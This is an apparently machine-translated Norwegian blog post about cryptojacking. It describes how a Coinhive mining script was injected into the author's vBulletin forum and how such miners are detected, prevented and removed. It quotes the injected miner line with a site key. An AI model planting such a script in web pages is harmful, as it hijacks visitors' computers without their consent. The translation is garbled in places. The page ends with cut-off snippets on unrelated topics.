Inside The Cryptocurrency Revolution
Innholdsfortegnelse:
Jeg har lest om nettstedseiere ved hjelp av skript på deres nettsider som bruker CPUen til den besøkende datamaskin når de besøker nettstedet deres. Tanken er å tjene penger på innholdet - og i stedet for å bruke annonser bruker de et skript som kjører i nettleseren, og bruker brukerens datafiler til å minecryptocurrency. Men jeg pleide å tro at bare nettstedseiere gjorde dette med design - jeg trodde aldri at hackere ville hacke nettsteder og skyve skriptet på andre nettsteder og bruke sine besøkende CPU til å tjene penger for seg selv. Men dette er det som ser ut til å skje nå!
Coinhive crypto-mining script
I går da jeg besøkte vårt TWC Forum, som kjører på vBulletin-programvare, slettet sikkerhetsprogramvaren denne advarselen:
// coinhive dot com /lib/coinhive.js Objektfil oppdaget, nedlastet blokkert
Jeg besøker vanligvis forumet hver dag, og jeg hadde ikke sett det dagen før. Så jeg antar at dette hadde skjedd litt om natten, min tid da jeg sov.
Jeg bruker vBulletin-programvare til forumet, og det ble oppdatert til den nyeste versjonen. Dessuten var dette ganske overraskende for oss, da TheWindowsClub.com-domenet bruker Sucuri Web Antivirus og brannmur for å beskytte seg mot Internett-trusler og angrep.
Min PC-sikkerhetsprogramvare stoppet vellykket det skadelige skriptet fra å kjøre på min Windows 10-datamaskin. Jeg sjekket med andre nettlesere som Chrome & Edge, og resultatene var de samme.
Etter å ha høyreklikket på forumets nettside og sjekket kildekoden, fant jeg ut at det var et CryptoMiner skadelig script av CoinHive.
Dette er den skadelige Coinhive Javascript som hadde kommet inn i forumkoden min:
var miner = ny CoinHive.Anonymous ("FG1d35B2h5xqzgJW0bbfyHT22ud9RnEm"); miner.start ();
Uansett var det første jeg gjorde å ta forumet ned og informere Sucuri.
Sucuri-folkene rydde forumet for Coinhive-skriptet som hadde blitt presset inn på forumet mitt om noen timer, og alt var fint.
Hva er CoinHive
Coinhive tilbud en JavaScript-gruvearbeider for Monero Cryptocurrency, som du kan legge inn på nettstedet ditt, og bruke CPUen til nettsøgende datamaskiner til min mynter for deg.
Dette kalles Cryptojacking . Det innebærer hijacking brukerens nettlesere for cryptocurrency mining. Noen nettsideeiere kan bruke det selv til å tjene penger - men i vårt tilfelle ble det injisert.
Når en bruker åpner det infiserte nettstedet, utfører Coinhive JavaScript og minene Monero bruker brukerens CPU-ressurser. Dette kan føre til CPU-gasspjelding og uventet systemkrasj av offerets maskin.
Nå hvis nettleseren din er smittet, ser du ressursutnyttelsen gå opp. Lukk nettleseren, og den vil slippe. Brukeren kan legge merke til at hans maskin oppvarmes, viften går fort, eller batteriet tømmes raskt.
Jeg spurte min kollega Saurabh Mukhekar å besøke forumet mitt ved hjelp av hans Mac og se hva som skjedde. Vel, hans Mac-datamaskin ble også berørt da han åpnet forumet med Safari! Han er en av de smarte Mac OSX-brukere som bruker en antivirusprogramvare for sin Mac. Avast-antivirusprogrammet for Mac stoppet vellykket det skadelige skriptet fra å kjøre.
Saurabur,
CoinHive-malware kapsler ikke bare en Windows-PC, men også Mac-en, da det er nettleserbasert Javascript-infeksjon. Det er bra Jeg tror ikke i myten at Mac ikke trenger en antivirusprogramvare, ellers ville maskinen ha blitt smittet, og min Mac ville fortsatt ha churn out mynter for noen andre.
Forhindre CoinHive fra å infisere nettstedet ditt
- Ikke bruk noen NULL maler eller plugins på din nettside / forum.
- Hold CMS oppdatert til den nyeste versjonen.
- Oppdater webleserprogramvaren jevnlig (PHP, Database, etc …).
- Sikre nettstedet ditt med websikkerhetsleverandører som Sucuri, Cloudflare, Wordfence, etc.
- Ta grunnleggende forholdsregler for å sikre bloggen din.
CoinHive minearrangør fjerning fra nettsiden
Først og fremst må du være webansvarlig for infisert nettsted - eller har administrativ legitimasjon som gir deg tilgang til alle websidene.
Når antivirusprogrammet ditt registrerer CoinHive-infeksjonen, høyreklikker du på nettsiden og velger Vis kildekode. Deretter trykker du på Ctrl + F og søker etter "CoinHive".
Når du har identifisert plasseringen til den ondsinnede koden, må du se sin posisjon - hvor ligger den. Nå må du fjerne den manuelt. For å gjøre dette trenger du litt kodende kunnskap om plattformen. Du må finne den infiserte filen / s og manuelt fjerne det ovenfor skriptet fra det. Hvis du ikke er sikker på det, vennligst spør noen ekspert å gjøre det. Siden vi bruker Sucuri, lar vi dem gjøre det.
Når du har gjort det, fjerner du hurtigbufferen til serveren og nettleseren din. Hvis du bruker et cache-plugin eller si MaxCDN, må du også fjerne disse cachene.
Beskytt deg mot kryptogruveskriptene
Cryptocurrencies & Blockchain-teknologien tar over hele verden. Det skaper en innvirkning på verdensøkonomien og forårsaker også teknologiske forstyrrelser. Alle har begynt å fokusere på et slikt lukrativt marked - og dette inkluderer også nettsted hackere. Når avkastningen øker, bør vi forvente at slike teknologier vil bli misbrukt. Det er den mørke siden av ny teknologi.
Det vi kan gjøre er å alltid ta de beste forholdsregler. Bortsett fra å bruke en god sikkerhetsprogramvare, bruk en Chrome- eller Firefox-utvidelse som blokkerer nettsteder fra å bruke CPU til min Cryptocurrency - eller bruk fortsatt Anti-WebMiner som stopper Cryptojacking Mining Script-angrep ved å endre vertsfilen din. Den fungerer på alle nettlesere. Hvis du er en Mac-bruker, må du også ha en antivirusprogramvare for datamaskinen din.
Som et spørsmål om rikelig forholdsregel, hvis du noen gang føler at du har besøkt et infisert nettsted, er det en god ide å slette nettleseren din cache og skann maskinen med antivirusprogramvaren din samt AdwCleaner.
Hold deg trygg, vær oppmerksom!
Slik legger du til Skype-knappen på nettstedet ditt
Du kan legge til en Skype-knapp på nettstedet ditt for å få bedre samhandling med kunder. La kundene ringe eller chatte rett fra nettstedet ditt
For en besøkende på nettstedet er det ganske frustrerende å tenke hvis man har spørsmål om et innlegg på nettstedet, men kan ` t finne noen metoder for å spørre nettstedet eier, i tillegg kommenterer i nevnte innlegg. Venterprosessen er usikker, da det kanskje til og med tar dager for nettstedseierne å svare, med mindre de overvåker sine nettsteder 24/7. Men leserne er ikke de eneste som blir skadet med områdets manglende evne til å kommunisere direkte med sine lesere - siden de ender med å gi d
Chatwing
Slik fjerner du eller fjerner programmer fra Windows 7-startmenyen
Hvis du har festet noen systemmapper som Computer, Papirkurv, Conytol Panel , osv., kan det hende du ikke får muligheten til å frigjøre programmet fra Start-menyen.